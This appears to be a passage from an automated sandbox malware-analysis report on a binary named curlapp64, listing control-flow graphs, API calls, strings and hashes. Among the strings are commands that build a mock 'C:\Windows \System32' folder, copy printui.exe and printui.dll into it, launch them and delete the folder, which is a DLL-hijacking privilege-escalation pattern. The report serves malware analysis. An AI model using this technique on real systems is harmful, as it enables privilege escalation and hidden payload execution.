7ff6cf97481c-7ff6cf974830 1358->1362 1363 7ff6cf974851-7ff6cf974859 1358->1363 1360 7ff6cf9747e8-7ff6cf9747fb 1359->1360 1361 7ff6cf974801 call 7ff6cf9a3b50 1359->1361 1360->1297 1360->1361 1361->1358 1366 7ff6cf97484b-7ff6cf974850 call 7ff6cf9a3b50 1362->1366 1367 7ff6cf974832-7ff6cf974845 1362->1367 1369 7ff6cf97488c-7ff6cf97489d 1363->1369 1370 7ff6cf97485b-7ff6cf97486c 1363->1370 1366->1363 1367->1277 1367->1366 1381 7ff6cf97495f-7ff6cf974998 call 7ff6cf975040 call 7ff6cf977b30 1368->1381 1369->1229 1375 7ff6cf9748a3-7ff6cf9748b4 1369->1375 1373 7ff6cf974887 call 7ff6cf9a3b50 1370->1373 1374 7ff6cf97486e-7ff6cf974881 1370->1374 1373->1369 1374->1284 1374->1373 1375->1256 1376 7ff6cf9748ba-7ff6cf9748cd 1375->1376 1376->1340 1380 7ff6cf9748d3 1376->1380 1380->1256 1386 7ff6cf9749cc-7ff6cf9749e0 call 7ff6cf974b50 1381->1386 1387 7ff6cf97499a-7ff6cf9749ac 1381->1387 1386->1342 1388 7ff6cf9749c7 call 7ff6cf9a3b50 1387->1388 1389 7ff6cf9749ae-7ff6cf9749c1 1387->1389 1388->1386 1389->1289 1389->1388
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: curl_easy_init$curl_easy_cleanup
                                                                                                                                                                                                  • String ID: CURL could not be initialized download_file$CURL could not be re-initialized download_file$CURL could not be re-initialized_2 download_file$ZYo
                                                                                                                                                                                                  • API String ID: 2458899574-3621752883
                                                                                                                                                                                                  • Opcode ID: efd0385c69d2ff162e114415cbcb01ae0abaf493d042c5adfebd02850e77729a
                                                                                                                                                                                                  • Instruction ID: c0d2e5800a53aae7922341f0d94d0f71a95c4908a1d8355d70404fd53e808013
                                                                                                                                                                                                  • Opcode Fuzzy Hash: efd0385c69d2ff162e114415cbcb01ae0abaf493d042c5adfebd02850e77729a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F22A062E18B8185EF109F68D4403BD6761EB857A5F505236EAED86BDFEF38E480C350
                                                                                                                                                                                                  Function 00007FF8B7E849E0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 342COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1600 7ff8b7e849e0-7ff8b7e84a2c 1601 7ff8b7e84a30-7ff8b7e84a37 1600->1601 1601->1601 1602 7ff8b7e84a39-7ff8b7e84a45 1601->1602 1603 7ff8b7e84a87-7ff8b7e84aa3 1602->1603 1604 7ff8b7e84a47-7ff8b7e84a5d call 7ff8b7eae230 1602->1604 1605 7ff8b7e84ab5-7ff8b7e84aca call 7ff8b7e850c0 1603->1605 1606 7ff8b7e84aa5-7ff8b7e84ab0 call 7ff8b7ea7730 1603->1606 1612 7ff8b7e84a5f-7ff8b7e84a71 call 7ff8b7eae230 1604->1612 1613 7ff8b7e84a73-7ff8b7e84a82 call 7ff8b7e74a70 1604->1613 1615 7ff8b7e84acc-7ff8b7e84ae5 call 7ff8b7e74b60 1605->1615 1616 7ff8b7e84ae9-7ff8b7e84af0 1605->1616 1606->1605 1612->1603 1612->1613 1623 7ff8b7e84f0c 1613->1623 1615->1616 1620 7ff8b7e84aff-7ff8b7e84b03 1616->1620 1621 7ff8b7e84af2-7ff8b7e84afa call 7ff8b7ea7770 1616->1621 1626 7ff8b7e84b09-7ff8b7e84b13 1620->1626 1627 7ff8b7e84f01-7ff8b7e84f09 1620->1627 1621->1620 1630 7ff8b7e84f0f-7ff8b7e84f35 call 7ff8b7ec9e10 1623->1630 1628 7ff8b7e84b49-7ff8b7e84b5f inet_pton 1626->1628 1629 7ff8b7e84b15-7ff8b7e84b43 call 7ff8b7e98350 * 2 1626->1629 1627->1623 1633 7ff8b7e84b67-7ff8b7e84b7d inet_pton 1628->1633 1634 7ff8b7e84b61-7ff8b7e84b65 1628->1634 1629->1628 1648 7ff8b7e84ede-7ff8b7e84ee3 1629->1648 1638 7ff8b7e84c0d-7ff8b7e84c15 1633->1638 1639 7ff8b7e84b83 1633->1639 1636 7ff8b7e84b87-7ff8b7e84b9a call 7ff8b7e718a0 1634->1636 1636->1648 1651 7ff8b7e84ba0-7ff8b7e84ba8 1636->1651 1641 7ff8b7e84c17-7ff8b7e84c25 1638->1641 1642 7ff8b7e84c56-7ff8b7e84c67 call 7ff8b7eae230 1638->1642 1639->1636 1646 7ff8b7e84c27-7ff8b7e84c3c call 7ff8b7e843b0 1641->1646 1647 7ff8b7e84c42-7ff8b7e84c50 1641->1647 1653 7ff8b7e84c6d 1642->1653 1654 7ff8b7e84cfb 1642->1654 1646->1647 1647->1642 1647->1648 1648->1630 1656 7ff8b7e84bbd-7ff8b7e84be4 call 7ff8b7e83e50 1651->1656 1657 7ff8b7e84baa-7ff8b7e84bb8 call 7ff8b7ea7730 1651->1657 1661 7ff8b7e84c74-7ff8b7e84c7b 1653->1661 1662 7ff8b7e84d02-7ff8b7e84d0b 1654->1662 1666 7ff8b7e84bf7-7ff8b7e84bfa 1656->1666 1667 7ff8b7e84be6-7ff8b7e84bf3 call 7ff8b7ea7770 1656->1667 1657->1656 1661->1661 1665 7ff8b7e84c7d-7ff8b7e84c81 1661->1665 1662->1662 1664 7ff8b7e84d0d-7ff8b7e84d44 htons inet_pton 1662->1664 1670 7ff8b7e84d4e-7ff8b7e84d69 calloc 1664->1670 1671 7ff8b7e84d46-7ff8b7e84d49 1664->1671 1668 7ff8b7e84c83-7ff8b7e84c9e call 7ff8b7eae2a0 1665->1668 1669 7ff8b7e84ca0-7ff8b7e84ca3 1665->1669 1674 7ff8b7e84ef3-7ff8b7e84efc call 7ff8b7e852d0 1666->1674 1675 7ff8b7e84c00-7ff8b7e84c08 call 7ff8b7e716c0 1666->1675 1667->1666 1668->1654 1668->1669 1677 7ff8b7e84ccb-7ff8b7e84cd8 call 7ff8b7e85510 1669->1677 1678 7ff8b7e84ca5-7ff8b7e84cac 1669->1678 1679 7ff8b7e84d6b-7ff8b7e84d6e 1670->1679 1680 7ff8b7e84d73-7ff8b7e84dac 1670->1680 1673 7ff8b7e84e9a-7ff8b7e84e9d 1671->1673 1673->1651 1683 7ff8b7e84ea3-7ff8b7e84ea6 1673->1683 1674->1627 1675->1627 1677->1648 1694 7ff8b7e84cde-7ff8b7e84ceb call 7ff8b7e83e40 1677->1694 1678->1677 1687 7ff8b7e84cae-7ff8b7e84cc6 call 7ff8b7e763d0 1678->1687 1679->1673 1688 7ff8b7e84db0-7ff8b7e84dbf 1680->1688 1683->1627 1690 7ff8b7e84ea8-7ff8b7e84eb9 1683->1690 1687->1673 1688->1688 1693 7ff8b7e84dc1-7ff8b7e84dc8 1688->1693 1695 7ff8b7e84ebb-7ff8b7e84ec0 call 7ff8b7e766b0 1690->1695 1696 7ff8b7e84ec2 call 7ff8b7e625a0 1690->1696 1698 7ff8b7e84dd0-7ff8b7e84dd7 1693->1698 1705 7ff8b7e84cf0-7ff8b7e84cf6 1694->1705 1707 7ff8b7e84ec7-7ff8b7e84ed0 1695->1707 1696->1707 1698->1698 1702 7ff8b7e84dd9-7ff8b7e84dee calloc 1698->1702 1703 7ff8b7e84e97 1702->1703 1704 7ff8b7e84df4-7ff8b7e84e77 htons inet_pton 1702->1704 1703->1673 1708 7ff8b7e84e80-7ff8b7e84e8f 1704->1708 1705->1673 1709 7ff8b7e84eda-7ff8b7e84edc 1707->1709 1710 7ff8b7e84ed2-7ff8b7e84ed5 call 7ff8b7e852d0 1707->1710 1708->1708 1712 7ff8b7e84e91-7ff8b7e84e95 1708->1712 1709->1648 1711 7ff8b7e84ee5-7ff8b7e84ef1 1709->1711 1710->1709 1711->1627 1712->1673
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: inet_pton$SimpleString::operator=inet_ntop
                                                                                                                                                                                                  • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                                                                                                                                                                                                  • API String ID: 1960554822-2421204314
                                                                                                                                                                                                  • Opcode ID: 0edaa2b13891c3644038c0d754203b9f17ad93a6b24d923121f716e7c7c04ea3
                                                                                                                                                                                                  • Instruction ID: 612b21eb5c2cebc949121bce86c7dde4b29f8e0ee4b442760dad3d43931c097c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0edaa2b13891c3644038c0d754203b9f17ad93a6b24d923121f716e7c7c04ea3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E19B62A08B8286FB148F6995503BC27A1EF45FD8F848236CF1D5B7A6EF7CE4558310
                                                                                                                                                                                                  Function 00007FF8B7EAB3F0 Relevance: 24.2, APIs: 16, Instructions: 185networkCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1809 7ff8b7eab3f0-7ff8b7eab438 socket 1810 7ff8b7eab43a 1809->1810 1811 7ff8b7eab43f-7ff8b7eab4be htonl setsockopt 1809->1811 1812 7ff8b7eab6aa-7ff8b7eab6c1 call 7ff8b7ec9e10 1810->1812 1813 7ff8b7eab661-7ff8b7eab67d closesocket * 3 1811->1813 1814 7ff8b7eab4c4-7ff8b7eab4da bind 1811->1814 1815 7ff8b7eab682-7ff8b7eab6a2 1813->1815 1814->1813 1817 7ff8b7eab4e0-7ff8b7eab4f4 getsockname 1814->1817 1815->1812 1817->1813 1819 7ff8b7eab4fa-7ff8b7eab4fe 1817->1819 1819->1813 1820 7ff8b7eab504-7ff8b7eab515 listen 1819->1820 1820->1813 1821 7ff8b7eab51b-7ff8b7eab532 socket 1820->1821 1821->1813 1822 7ff8b7eab538-7ff8b7eab54e connect 1821->1822 1822->1813 1823 7ff8b7eab554-7ff8b7eab563 call 7ff8b7e9c2d0 1822->1823 1823->1813 1826 7ff8b7eab569-7ff8b7eab59e call 7ff8b7ea2110 accept 1823->1826 1826->1813 1829 7ff8b7eab5a4-7ff8b7eab5c9 call 7ff8b7eb3b60 call 7ff8b7e9fe30 1826->1829 1829->1813 1834 7ff8b7eab5cf-7ff8b7eab5dc send 1829->1834 1835 7ff8b7eab5e2-7ff8b7eab61f call 7ff8b7ea2110 recv 1834->1835 1838 7ff8b7eab6c2-7ff8b7eab6c5 1835->1838 1839 7ff8b7eab625-7ff8b7eab656 WSAGetLastError call 7ff8b7eb3b60 call 7ff8b7eb3bf0 1835->1839 1840 7ff8b7eab6c7-7ff8b7eab6ca 1838->1840 1841 7ff8b7eab6cf-7ff8b7eab6d7 1838->1841 1839->1813 1851 7ff8b7eab658-7ff8b7eab65f 1839->1851 1840->1835 1841->1813 1843 7ff8b7eab6d9-7ff8b7eab6e0 1841->1843 1843->1813 1845 7ff8b7eab6e6-7ff8b7eab6ea 1843->1845 1847 7ff8b7eab717-7ff8b7eab722 closesocket 1845->1847 1848 7ff8b7eab6ec-7ff8b7eab6fb call 7ff8b7e9c2d0 1845->1848 1847->1815 1848->1813 1853 7ff8b7eab701-7ff8b7eab711 call 7ff8b7e9c2d0 1848->1853 1851->1813 1851->1835 1853->1813 1853->1847
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3053784475-0
                                                                                                                                                                                                  • Opcode ID: 1bb7a794f3deee7d1c13a4b4dd252113753dd7fa9697ba9a424b8ab8f9739e6a
                                                                                                                                                                                                  • Instruction ID: 0050c09de05b656f9ba9293f7741e1955cf5d0132005d11172d82c74d51bf90e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bb7a794f3deee7d1c13a4b4dd252113753dd7fa9697ba9a424b8ab8f9739e6a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B814726B08B4185F7209B79D4146AC2375EF85FA8F504331DF6D56AF8DF7DA58A8300
                                                                                                                                                                                                  Function 00007FF6CF999220 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 169processCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                  • String ID: C:\Windows \System32$\printui.dll$\printui.exe$cmd.exe /c {}$mkdir "\\?\C:\Windows \System32"$ZYo
                                                                                                                                                                                                  • API String ID: 963392458-1711559977
                                                                                                                                                                                                  • Opcode ID: 8ef37a16a0e93e1f0e3211a343e2f1cd4eb9f217ec1685b3985db9c7388b8d24
                                                                                                                                                                                                  • Instruction ID: 787f64dce5ba8dbba2298c073aea6e230418b9f7850979a561112d029ceb578a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ef37a16a0e93e1f0e3211a343e2f1cd4eb9f217ec1685b3985db9c7388b8d24
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B718233E18B819AEB00CF75E8403AD73B1FB99798F115226EA8D92A5DDF78D185C740
                                                                                                                                                                                                  Function 00007FF8B7E9B4E0 Relevance: 15.4, APIs: 10, Instructions: 364COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 72dbaf36b25fb1a54903ad3042ef5a4178e41f172bc65f0bc918713216212238
                                                                                                                                                                                                  • Instruction ID: 781993216ccb0ac9b68b6572131e598daca17a75e2a31567a149cd283db7b2a4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72dbaf36b25fb1a54903ad3042ef5a4178e41f172bc65f0bc918713216212238
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE16E22B1979282EB658BAAE4507BE67A5FF85BC4F444135EF8D47B64DF3CE4408B00
                                                                                                                                                                                                  Function 00007FF6CF9989B0 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 246COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: C:\Windows\System32\printui.exe$mkdir "\\?\C:\Windows \System32"$printui.dll copy error: {}$printui.exe copy error: {}$rmdir /s /q "C:\Windows \"$start "" "{}"$ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-3787344366
                                                                                                                                                                                                  • Opcode ID: 9115715e9d1820e5a2387ad5d1faf78ddb0d0e9a12366fef12d03b2854ec9e88
                                                                                                                                                                                                  • Instruction ID: 99e434b768819740a8768dc45735265af10308483db753ca5677a4d4e324a933
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9115715e9d1820e5a2387ad5d1faf78ddb0d0e9a12366fef12d03b2854ec9e88
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAB1EA13E092D14DEB018F7580401BD7FB0EB0A759B998176DBED9BA8BDE28D785C720
                                                                                                                                                                                                  Function 00007FF6CF9C393C Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                  • Opcode ID: c36d5e2f6024639414df951a4179946f9be0986b4d04d1258ac58a2aca572ab2
                                                                                                                                                                                                  • Instruction ID: ad07d66511dbd4a276e63b39dc4c864403cd72c5a2c41a364725a2e5866b9cb4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c36d5e2f6024639414df951a4179946f9be0986b4d04d1258ac58a2aca572ab2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35C1DF32B28A4186EF10EF69C4806AC37B1FB49B99F114225DF9E9779ACF38E455C710
                                                                                                                                                                                                  Function 00007FF8B7E9AA52 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 339COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$CounterPerformanceQuery
                                                                                                                                                                                                  • String ID: Resolving timed out after %lld milliseconds
                                                                                                                                                                                                  • API String ID: 3490100708-1439975193
                                                                                                                                                                                                  • Opcode ID: 32c18f11e346c206080d952d4960eb8eecf65e7c8f309cfd860842771826d614
                                                                                                                                                                                                  • Instruction ID: ca68cb456b9d426460956f501b7733c5264bfe419df6d5b93b7cde3860e8c8f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32c18f11e346c206080d952d4960eb8eecf65e7c8f309cfd860842771826d614
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DE17962A0CB8281EB619B6D94012BD63A0EF85FD8F545131DF4D4B7AAEF3CE885C340
                                                                                                                                                                                                  Function 00007FF8B7E9A4A4 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 318COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
                                                                                                                                                                                                  • API String ID: 1294909896-247252918
                                                                                                                                                                                                  • Opcode ID: c1a50e4a4c8a872b49a77e20e77f6baced25ec2f8a8b8efc9e9cedda6a28a0f6
                                                                                                                                                                                                  • Instruction ID: cff4edcbde27347639c5bc409bf443ae5ed3aa5fbd31fdc22da68a099d6c3e34
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1a50e4a4c8a872b49a77e20e77f6baced25ec2f8a8b8efc9e9cedda6a28a0f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64D17B63A0C78281EB659AAD94552BD27A1EF81FD8F445135DF0E476EAEF3CE884C340
                                                                                                                                                                                                  Function 00007FF8B7E664A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastrecv
